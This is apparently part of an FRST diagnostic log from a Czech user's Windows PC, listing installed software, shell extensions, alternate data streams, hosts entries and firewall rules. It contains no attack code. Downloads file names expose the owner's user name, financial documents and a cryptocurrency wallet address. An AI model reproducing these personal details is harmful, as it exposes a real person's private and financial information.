Outils de vérification linguistique 2016 de Microsoft Office - Français (HKLM\...\{90160000-001F-040C-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
PrivaZer (HKLM-x32\...\PrivaZer) (Version: 4.0.17.0 - Goversoft LLC)
Rainmeter (HKLM-x32\...\Rainmeter) (Version: 4.3.1 r3321 - Rainmeter)
Revisores de Texto do Microsoft Office 2016 – Português (Brasil) (HKLM\...\{90160000-001F-0416-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
RoboForex - MetaTrader 4 (HKLM-x32\...\RoboForex - MetaTrader 4) (Version: 4.00 - MetaQuotes Software Corp.)
Strumenti di correzione di Microsoft Office 2016 - Italiano (HKLM\...\{90160000-001F-0410-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Subtitle Edit 3.5.18 (HKLM\...\SubtitleEdit_is1) (Version: 3.5.18.1 - Nikse)
SUPERAntiSpyware (HKLM\...\{CDDCBBF1-2703-46BC-938B-BCC81A1EEAAA}) (Version: 6.0.1254 - SUPERAntiSpyware.com)
Taalprogramma's voor Microsoft Office 2016 - Nederlands (HKLM\...\{90160000-001F-0413-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
TeamViewer (HKLM-x32\...\TeamViewer) (Version: 15.2.2756 - TeamViewer)
Telegram Desktop version 2.5.1 (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1) (Version: 2.5.1 - Telegram FZ-LLC)
Total Commander 64+32-bit (Remove or Repair) (HKLM\...\Totalcmd64) (Version: 9.21a - Ghisler Software GmbH)
Tweetz Desktop verze 0.11.0 (HKLM-x32\...\{FE1B7E2D-6E96-4D39-B39F-62CA62D11A79}_is1) (Version: 0.11.0 - Mike Ward)
Uirlisí Profála Microsoft Office 2016 - Gaeilge (HKLM\...\{90160000-001F-083C-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Ulož.to FileManager 2.82 (64-bit) (HKLM\...\3f2e2cd28b0e4e4396c2402fbc85a0f0_is1) (Version: 2.82 - Uloz.to cloud a.s.)
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{F814D094-197F-43C8-87FA-3210BB780486}) (Version: 2.53.0.0 - Microsoft Corporation)
Veglat e kontrollit gjuhësor të Microsoft Office 2016 - shqip (HKLM\...\{90160000-001F-041C-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
VLC media player (HKLM\...\VLC media player) (Version: 3.0.8 - VideoLAN)
Web Launch Recorder (HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\WebLaunchRecorder) (Version: 2.0 - )
Εργαλεία γλωσσικού ελέγχου του Microsoft Office 2016 - Ελληνικά (HKLM\...\{90160000-001F-0408-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Засоби перевірки правопису Microsoft Office 2016 – українська (HKLM\...\{90160000-001F-0422-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Средства проверки правописания Microsoft Office 2016 — русский (HKLM\...\{90160000-001F-0419-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
כלי ההגהה של Microsoft Office 2016 - עברית (HKLM\...\{90160000-001F-040D-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
ابزارهای تصحیح Microsoft Office 2016 - فارسی (HKLM\...\{90160000-001F-0429-1000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden

Packages:
=========
Deezer Music -> C:\Program Files\WindowsApps\Deezer.62021768415AF_4.32.0.0_x86__q7m17pa7q8kj0 [2021-01-19] (Deezer SA)
Easy WOL (Wake on LAN) -> C:\Program Files\WindowsApps\1460ArunasAdomaitis.EasyWOLWakeonLAN_1.1.1.0_x64__fzh5k4x0zh00p [2019-05-21] (Arunas Adomaitis)
Facebook -> C:\Program Files\WindowsApps\Facebook.Facebook_186.2619.19263.0_x86__8xx8rvfyw5nnt [2019-10-10] (Facebook Inc)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-02-03] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-02-03] (Microsoft Corporation) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.9.1102.0_x64__8wekyb3d8bbwe [2021-01-13] (Microsoft Studios) [MS Ad]
Microsoft To Do -> C:\Program Files\WindowsApps\Microsoft.Todos_2.36.4182.0_x64__8wekyb3d8bbwe [2021-01-19] (Microsoft Corporation) [Startup Task]
Minecraft for Windows 10 -> C:\Program Files\WindowsApps\Microsoft.MinecraftUWP_1.16.20102.0_x64__8wekyb3d8bbwe [2020-12-16] (Microsoft Studios)
Samsung Printer Experience -> C:\Program Files\WindowsApps\SAMSUNGELECTRONICSCO.LTD.SamsungPrinterExperience_1.3.15.0_x64__3c1yjt4zspk6g [2017-02-03] (Samsung Electronics Co. Ltd.)
Twitter -> C:\Program Files\WindowsApps\9E2F88E3.Twitter_6.1.4.1000_neutral__wgeqdkkx372wm [2018-09-08] (Twitter Inc.)

==================== Custom CLSID (Whitelisted): ==============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> No File
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> No File
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> No File
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> No File
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) [File not signed]
ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers1: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2019-02-28] (Florian Heidenreich) [File not signed]
ContextMenuHandlers1: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers2: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2019-02-28] (Florian Heidenreich) [File not signed]
ContextMenuHandlers2: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers3: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) [File not signed]
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers4: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2019-02-28] (Florian Heidenreich) [File not signed]
ContextMenuHandlers4: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\WINDOWS\system32\igfxpph.dll [2012-11-26] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov) [File not signed]
ContextMenuHandlers6: [PrivaZer] -> {7691BE2F-3D79-AADE-9C87-4D6EBCC76682} => C:\Program Files (x86)\PrivaZer\PrivaMenu6.dll [2021-01-09] (Goversoft LLC -> )

==================== Codecs (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Drivers32: [vidc.ffds] => C:\Windows\SysWOW64\ff_vfw.dll [7680 2009-12-17] () [File not signed]

==================== Shortcuts & WMI ========================

==================== Loaded Modules (Whitelisted) =============

2019-10-12 11:29 - 2016-07-21 09:54 - 000137728 _____ () [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\CBSCreateVC.dll
2019-10-12 11:29 - 2016-10-08 16:03 - 001506304 _____ () [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\DAQExp.dll
2019-02-28 17:03 - 2019-02-28 17:03 - 000424448 _____ (Florian Heidenreich) [File not signed] C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll
2017-01-30 09:21 - 2016-10-04 15:51 - 000076800 _____ (Igor Pavlov) [File not signed] C:\Program Files\7-Zip\7-zip.dll
2019-10-12 11:29 - 2016-10-08 16:04 - 000708608 _____ (Wondershare) [File not signed] C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\CBSProducstInfo.dll

==================== Alternate Data Streams (Whitelisted) ========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\ProgramData\TEMP:0888F409 [284]
AlternateDataStreams: C:\ProgramData\TEMP:3440EB47 [143]
AlternateDataStreams: C:\ProgramData\TEMP:66633281 [159]
AlternateDataStreams: C:\ProgramData\TEMP:93433455 [820]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\0000003044029183_20171231_D_007_000_M_C.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\0000003044029183_20190831_K_008_000_M_C.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\102394978_1.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\2018-03-12 12_24_15-Historie transakcí _ SERVIS 24.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\2568bee2-7540-4a15-b62b-abf4c8ec8122.tmp:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\61cd06ea-2cc3-448b-9ead-882a3b596714.tmp:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\avidemux_2.7.1_win32.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\ChromeSetup.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\cpg15x:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\creditNote_1900000049.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\desktop (New).ini:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\DropboxInstaller.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\e8318c29-e1d9-482a-b440-976b38e0cf1e.tmp:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura k dorucene dodavce (1).PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura k dorucene dodavce.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura mining 2.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura12. 9. 2018.pdf:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktuta mining 001.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\IMG_20180407_084256.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\index.php:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\invoice_180105480.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\JDownloader:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\jollycoin-node-1.0.tar.xz:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\kalendar_2018_str_2_p000000.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Kalendář-2018-1.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\KMS_2038 & Digital & Online Activation Suite v8.4:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Mall rádio.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Mall rádio2.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Malwarebytes Anti-Malware 3.6.1.2711.rar:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\NewDoc 2018-03-18 (1).jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\NewDoc 2018-03-18.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\OBJ2018040003 (1).pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\OBJ2018040003.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\PA2018040002.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\payeer_mastercard_en.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\plna_moc (1.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\plna_moc.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Plná moc.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\priloha1.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\readme.txt:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Recepty_pro_horkovzdušnou_fritézu_R-286__CZ__11.11.2016.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\reklamacni_list.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Reklamacny-formular-vasmobil.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Shhq5QS4WNM18Ap85GVYjpNctzp3LRFeZP.json:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Sken 14. 7. 2018.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Sken 26. 6. 2018 (2).pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Spořitelna.png:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TeamViewerQS.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Telegram Desktop:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TH_20180601-20180623.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TRUSTED_TunePat_Netflix_Video_keygen:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Ulozto:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\UTC--2017-11-14T18-20-12.713Z--984d522fcd4684d49e0d08715da5c20cba86eceb:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Vypis z klientskeho uctu za obdobi 1802.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vypoved-pojistne-smlouvy.doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy (1).doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy (2).doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy.doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Vzor_vypovedi_pojistne_smlouvy.docx:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\wordpress:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Zadost 26. 6. 2018.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\__MACOSX:com.dropbox.attrs [54]

==================== Safe Mode (Whitelisted) ==================

==================== Association (Whitelisted) =================

==================== Internet Explorer (Whitelisted) ==========

BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office16\OCHelper.dll [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office16\GROOVEEX.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: WebTransBHO Class -> {2DB66063-BB98-466A-AA0D-3E7ACF5ED853} -> C:\TRANSLAT\Translator_2016.03\WebIE.dll [2019-01-28] () [File not signed]
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office16\OCHelper.dll [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_271\bin\ssv.dll [2020-10-26] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office16\GROOVEEX.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_271\bin\jp2ssv.dll [2020-10-26] (Oracle America, Inc. -> Oracle Corporation)
Toolbar: HKLM-x32 - WebTranslator - {BFC32E1D-EE75-4A48-BC60-104E11EE2431} - C:\TRANSLAT\Translator_2016.03\WebIE.dll [2019-01-28] () [File not signed]
Handler: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)

==================== Hosts content: =========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2016-07-16 12:47 - 2020-03-06 18:30 - 000001029 ____R C:\WINDOWS\system32\drivers\etc\hosts
127.0.0.1 www.langsoft.cz
127.0.0.1 www.pctranslator.cz
177.9.78.49 ww1.moondoge.co.in
177.9.78.49 ww1.moonbit.co.in

2019-11-30 16:39 - 2019-11-30 16:44 - 000000439 _____ C:\WINDOWS\system32\drivers\etc\hosts.ics

==================== Other Areas ===========================

(Currently there is no automatic fix for this section.)

HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\ProgramData\Oracle\Java\javapath;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;%SYSTEMROOT%\System32\OpenSSH\
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\Control Panel\Desktop\\Wallpaper -> c:\windows\web\wallpaper\theme1\img13.jpg
DNS Servers: 192.168.0.1 - 1.1.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(If an entry is included in the fixlist, it will be removed.)

HKLM\...\StartupApproved\Run32: => "Dropbox"
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\StartupApproved\StartupFolder: => "Poslat do aplikace OneNote.lnk"
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\StartupApproved\StartupFolder: => "IQTray.lnk"
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\StartupApproved\Run: => "Microsoft Software Essentials"

==================== FirewallRules (Whitelisted) ================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [UDP Query User{4CF5DFC9-9461-49D6-950C-BB62564F6244}C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe => No File
FirewallRules: [TCP Query User{CD7B74D8-A37B-4004-84B4-A34E0A3D68ED}C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe => No File
FirewallRules: [UDP Query User{BC12CC3D-9EB7-430F-A11E-D240044FD1A6}C:\program files (x86)\youwave android\vb\vboxsdl.exe] => (Allow) C:\program files (x86)\youwave android\vb\vboxsdl.exe => No File
FirewallRules: [TCP Query User{E1BC68F1-347B-4940-8A33-5D907DBCDA84}C:\program files (x86)\youwave android\vb\vboxsdl.exe] => (Allow) C:\program files (x86)\youwave android\vb\vboxsdl.exe => No File
FirewallRules: [UDP Query User{29287B3F-2A2F-4C57-A399-98061B1E6F2B}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe => No File
FirewallRules: [TCP Query User{7E06897A-6AF1-466E-9D68-134E4975B2C8}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe => No File
FirewallRules: [{793400D7-7C54-425B-9BD7-60F988299959}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{D34719B9-E1F9-42F6-BA3A-AA6AF2D45F2E}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{2F9D3059-4454-4A07-BEE5-D6684A9BC8B9}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [{033BC72C-1DEC-4D1D-87CB-14942A26DDDB}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
FirewallRules: [UDP Query User{25003063-5796-4BA7-9F27-DF50B557D31D}D:\filmy\seriály\telenovely\moonbot\moonbot.exe] => (Allow) D:\filmy\seriály\telenovely\moonbot\moonbot.exe => No File
FirewallRules: [TCP Query User{E8D4CD91-1165-4346-8883-1D96257E6F52}D:\filmy\seriály\telenovely\moonbot\moonbot.exe] => (Allow) D:\filmy\seriály\telenovely\moonbot\moonbot.exe => No File
FirewallRules: [{ADECB0C0-D817-4AFC-AB5F-3E7FDA043DFE}] => (Allow) C:\WINDOWS\system32\alg.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{CC710CB0-69B1-4D2B-9AAE-B86204635A9F}] => (Allow) C:\WINDOWS\system32\alg.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [{DE047D0E-57E7-42E5-852F-33C6129D3B85}] => (Allow) C:\WINDOWS\system32\alg.exe (Microsoft Windows -> Microsoft Corporation)
FirewallRules: [UDP Query User{0AAFD932-9B41-400A-B798-B7F6A5298120}C:\program files\videolan\vlc\vlc.exe] => (Allow) C:\program files\videolan\vlc\vlc.exe (VideoLAN -> VideoLAN)
FirewallRules: [TCP Query User{0FFA7186-061D-43D7-922F-73C9FE27F461}C:\program files\videolan\vlc\vlc.exe] => (Allow) C:\program files\videolan\vlc\vlc.exe (VideoLAN -> VideoLAN)
FirewallRules: [UDP Query User{D7909A0E-59A3-44AA-AD21-357E7A504E90}C:\users\irena-pc\appdata\local\jdownloader 2.0\jdownloader2.exe] => (Allow) C:\users\irena-pc\appdata\local\jdownloader 2.0\jdownloader2.exe (Appwork GmbH -> AppWork GmbH)
FirewallRules: [TCP Query User{60724E25-F8FD-44AA-9BC9-A2ADC8EC3C89}C:\users\irena-pc\appdata\local\jdownloader 2.0\jdownloader2.exe] => (Allow) C:\users\irena-pc\appdata\local\jdownloader 2.0\jdownloader2.exe (Appwork GmbH -> AppWork GmbH)
FirewallRules: [{C9001568-7E61-4092-92AC-A2A34F885F7B}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{4E0915DD-85DC-4816-9616-A952C0C0C79C}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{1AB3D34D-2096-4639-A6F4-DB0021276C1B}] => (Allow) C:\Program Files\Microsoft Office\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{8A8D7038-61CD-44CF-88BD-3B4A6221113F}] => (Allow) C:\Program Files\Microsoft Office\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{6E0C9F16-EE9A-44B8-9451-7D5FB88A5D9D}] => (Allow) C:\Program Files\Microsoft Office\Office16\lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [{EB36692E-B7B2-42BD-BC9B-B5B9C427A112}] => (Allow) C:\Program Files\Microsoft Office\Office16\lync.exe (Microsoft Corporation -> Microsoft Corporation)
FirewallRules: [TCP Query User{2E494270-3352-4EE4-9BEB-DFDABEB0B492}C:\utorrent\utorrent.exe] => (Allow) C:\utorrent\utorrent.exe (uTorrent.CZ -> BitTorrent, Inc.) [File not signed]
FirewallRules: [UDP Query User{CE8260C1-93C7-47AF-97D4-687806A341AB}C:\utorrent\utorrent.exe] => (Allow) C:\utorrent\utorrent.exe (uTorrent.CZ -> BitTorrent, Inc.) [File not signed]
FirewallRules: [TCP Query User{41A0FD6F-32C7-4629-843F-F84BD1CF7F57}C:\totalcmd\totalcmd64.exe] => (Allow) C:\totalcmd\totalcmd64.exe (Ghisler Software GmbH -> Ghisler Software GmbH)
FirewallRules: [UDP Query User{F7DDB9BD-EF26-4906-BD31-A72205B5AFBB}C:\totalcmd\totalcmd64.exe] => (Allow) C:\totalcmd\totalcmd64.exe (Ghisler Software GmbH -> Ghisler Software GmbH)
FirewallRules: [TCP Query User{2996E712-43FC-4FF8-8202-BA352CC77FF9}C:\program files (x86)\java\jre1.8.0_271\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_271\bin\javaw.exe
